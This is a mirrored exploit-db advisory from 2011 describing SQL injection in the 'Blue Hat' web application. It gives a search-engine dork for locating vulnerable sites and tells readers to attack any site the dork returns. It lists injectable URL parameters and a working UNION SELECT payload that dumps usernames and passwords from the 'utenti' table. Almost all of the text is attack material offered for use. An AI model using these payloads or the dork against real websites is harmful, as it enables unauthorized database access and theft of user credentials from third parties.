Blue Hat – Sensitive Database Disclosure / SQL Injection

  • 作者: ^Xecuti0N3r
    日期: 2011-04-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17178/
  • #(+)Exploit Title: Powered by Blue Hat Sensitive Database Disclosure Vulnerability
    #(+)Author : ^Xecuti0n3r
    #(+) Date: 12.04.2011
    #(+) Hour: 13:37 PM
    #(+) E-mail:xecuti0n3r()yahoo.com
    #(+) dork: intext:"Powered by Blue Hat"
    #(+) Category: Web Apps [SQli]
    
    ____________________________________________________________________
    ____________________________________________________________________
    
    Choose any site that comes up when you enter the dork intext:"Powered by Blue Hat" in search engine
    
    
    *SQL injection Vulnerability*
    	
    	
    #[+]http://site.com/video.php?id_att='111
    #[+]http://site.com/video.php?id_att=[SQLI]
    #[+]http://site.com/mappa.php?id_att='2121
    #[+]http://site.com/mappa.php?id_att=[SQLI]
    #[+]http://site.com/elenco_attivita.php?id_cat='101
    #[+]http://site.com/elenco_attivita.php?id_cat=[SQLI]
    #[+]http://site.com/prodotti.php?id='6
    #[+]http://site.com/prodotti.php?id=[SQLI]
    #[+]http://site.com/prodotti.php?id=-6+union+select+1,concat(username,0x3a,password)+from+utenti
    
    
    
    ____________________________________________________________________
    ____________________________________________________________________
    
    ########################################################################
    (+)Exploit Coded by: ^Xecuti0n3r 
    (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
    ########################################################################